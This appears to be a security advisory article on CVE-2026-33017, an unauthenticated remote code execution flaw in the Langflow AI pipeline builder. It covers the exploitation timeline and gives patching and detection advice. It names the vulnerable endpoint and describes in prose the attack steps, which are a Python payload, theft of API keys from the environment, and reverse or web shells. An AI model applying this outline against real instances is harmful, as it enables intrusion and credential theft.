💻 AppSec

Langflow RCE CVE-2026-33017 Exploited Within 20 Hours, Added to CISA KEV

A critical unauthenticated remote code execution vulnerability in Langflow AI pipeline builder was exploited in the wild within 20 hours of disclosure, with attackers harvesting API keys for OpenAI, Anthropic, and AWS from compromised instances. CISA added CVE-2026-33017 to the Known Exploited Vulnerabilities catalogue on 26 March, making patching mandatory for US federal agencies.

4 min read
#langflow#rce#unauthenticated#ai-security#cisa-kev#cve-2026-33017#llm#api-key-theft

The Vulnerability

CVE-2026-33017 is an unauthenticated remote code execution flaw in Langflow, the widely-used open-source visual platform for building AI agent pipelines and LLM workflows. The vulnerability exists in the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint — a feature designed to allow unauthenticated users to build and run public flows.

The flaw arises because the endpoint accepts attacker-supplied flow data containing arbitrary Python code in node definitions, which Langflow executes server-side without any sandboxing. No credentials, no authenticated session, no user interaction — an unauthenticated HTTP request is sufficient to achieve code execution on the underlying server.

CVSS base score: 9.3 (Critical). All Langflow versions through 1.8.1 are affected. The fix is version 1.9.0.

Exploitation: 20 Hours from Advisory to Attacks

The Sysdig Threat Research Team documented exploitation activity beginning within 20 hours of the vulnerability’s public disclosure on 17 March 2026. Critically, no public proof-of-concept code existed at the time — attackers reverse-engineered working exploits directly from the advisory description alone.

The observed attack pattern is consistent:

  1. Unauthenticated attacker sends a crafted POST request to the public flow build endpoint containing an embedded Python payload
  2. Langflow executes the payload under its service account
  3. Attacker harvests environment variables and filesystem contents, specifically targeting API keys for OpenAI, Anthropic, Google Gemini, and AWS
  4. Secondary payloads establish persistent reverse shells or web shells for ongoing access

CISA added CVE-2026-33017 to the Known Exploited Vulnerabilities catalogue on 26 March, confirming sustained active exploitation across internet-exposed instances.

Why AI Pipeline Platforms Are High-Value Targets

Langflow deployments are particularly attractive to attackers for several compounding reasons.

API key concentration. Langflow instances are configured with API keys for the large language model providers and cloud services powering the pipelines. Compromising a single Langflow instance often yields credentials for OpenAI, Anthropic, AWS, Azure, and Google Cloud simultaneously.

Business logic access. Langflow hosts the definitions of an organisation’s AI workflows — proprietary agent configurations, prompt engineering, tool integrations, and automation logic. This represents significant intellectual property beyond the API keys themselves.

Transitive access. Many Langflow deployments are connected to internal databases, file storage, and APIs as data sources for their pipelines. A compromise of the Langflow server can provide lateral access into production data systems.

Lateral movement. Stolen cloud credentials — particularly AWS or Azure keys — frequently have permissions far beyond what was needed for the Langflow integration, enabling attackers to pivot into cloud environments.

Affected Environments

Langflow is deployed across enterprises, AI startups, research institutions, and development teams building AI-powered products. The platform is popular specifically because it enables non-engineers to build and deploy LLM pipelines through a drag-and-drop interface, which means it is frequently deployed by teams without deep security oversight.

Deployments directly exposed to the internet are at highest risk, but any instance reachable from a compromised internal network represents a target once an attacker has an initial foothold.

Immediate:

  1. Upgrade Langflow to version 1.9.0 immediately — this is the only complete fix. There is no workaround that fully mitigates code execution risk while keeping public flow functionality enabled
  2. Disable the public flow build endpoint if upgrading is not immediately possible: restrict access to /api/v1/build_public_tmp/ at your reverse proxy or firewall
  3. Rotate all API keys stored in Langflow’s environment or configured in flows — treat them as compromised. This includes OpenAI, Anthropic, AWS, Azure, Google Cloud, and any other service keys present
  4. Audit Langflow access logs for POST requests to /api/v1/build_public_tmp/ originating from unexpected source IPs
  5. Remove internet exposure of Langflow admin interfaces — these should sit behind VPN or a zero-trust gateway, not be directly internet-accessible

Detection:

  • Alert on unexpected processes spawned by the Langflow service account
  • Monitor for unusual outbound connections from Langflow servers, particularly to external IPs
  • Check cloud provider billing dashboards for anomalous API usage (a common indicator of stolen key abuse)